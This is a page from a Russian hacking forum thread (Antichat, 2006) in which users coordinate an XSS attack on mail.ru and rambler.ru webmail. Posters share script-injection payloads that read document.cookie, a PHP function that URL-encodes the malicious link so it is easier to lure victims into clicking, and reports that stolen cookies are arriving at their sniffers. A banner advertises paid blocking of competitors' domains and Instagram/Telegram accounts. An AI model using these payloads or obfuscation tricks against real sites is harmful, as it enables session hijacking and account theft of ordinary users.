XSS mail.ru rambler.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
XSS mail.ru rambler.ru

Страница 3 из 7

Опции темы

Поиск в этой теме

Опции просмотра

#21

05.12.2006, 16:03

А®ТеS

Участник форума

Регистрация: 25.11.2006

Сообщений: 291

С нами: 10242288

Репутация: 536

Spaсибо, все ок!!!

#22

05.12.2006, 17:40

Makes

Познающий

Регистрация: 21.11.2006

Сообщений: 30

С нами: 10247373

Репутация: -1

Все вроде делаю, как указано на первой странице. Чего то не прокатывает. Видимо делаю что-то не так. Ваш рабочий вариант на данный момент отличается от оного на первой странице?

#23

05.12.2006, 17:51

m17

Новичок

Регистрация: 05.12.2006

Сообщений: 22

С нами: 10226922

Репутация: 6

вчера "+" фильтровать начали, но с concat все нормально пашет. советую ссылку обработать такой функией:

PHP код:


		
			
function full_encode($str)

{

    $result = '';

    for ($i=0; $i < strlen($str); $i++)

        $result .= ("%" . bin2hex(substr($str, $i, 1)));



    return strtoupper($result);

        

}

так проще впарить. думаю Вам не надо объяснять почему так...

#24

05.12.2006, 18:11

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

С нами: 10885346

Репутация: 2947

Ничё там не фильтруется!...
всё работает!

#25

05.12.2006, 18:18

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

С нами: 10566621

Репутация: 1198

пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))

#26

05.12.2006, 18:18

Chumak

Познающий

Регистрация: 27.10.2006

Сообщений: 59

С нами: 10283366

Репутация: 6

А у меня куки на сниффер только от фаерфокса почемуто приходят...

#27

05.12.2006, 18:19

Chumak

Познающий

Регистрация: 27.10.2006

Сообщений: 59

С нами: 10283366

Репутация: 6

"пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))"
Точно...

#28

05.12.2006, 18:27

Makes

Познающий

Регистрация: 21.11.2006

Сообщений: 30

С нами: 10247373

Репутация: -1

Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок

#29

05.12.2006, 18:28

m17

Новичок

Регистрация: 05.12.2006

Сообщений: 22

С нами: 10226922

Репутация: 6

Цитата:

Ничё там не фильтруется!...
всё работает!

Фильтруется.

Код HTML:

"><script>alert(document.cookie);</script><br style="

покажет куки

Код HTML:

"><script>alert(document.cookie+'dead-plus');</script><br style="

промолчит

откроем исходник и увидим:

Код HTML:

name="tcurl" value=""><script>alert(document.cookie "dead-plus");</script>

("+" исчез)

только что еще раз затестил

#30

05.12.2006, 18:37

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

С нами: 10885346

Репутация: 2947

ХЗ ..куки приходят!

Страница 3 из 7

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Реализация XSS на rambler.ru	Майор	Уязвимости Mail-сервис	8	21.09.2006 20:50
Xss на mail.ru	em00s7	Уязвимости Mail-сервис	14	08.06.2006 00:38

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход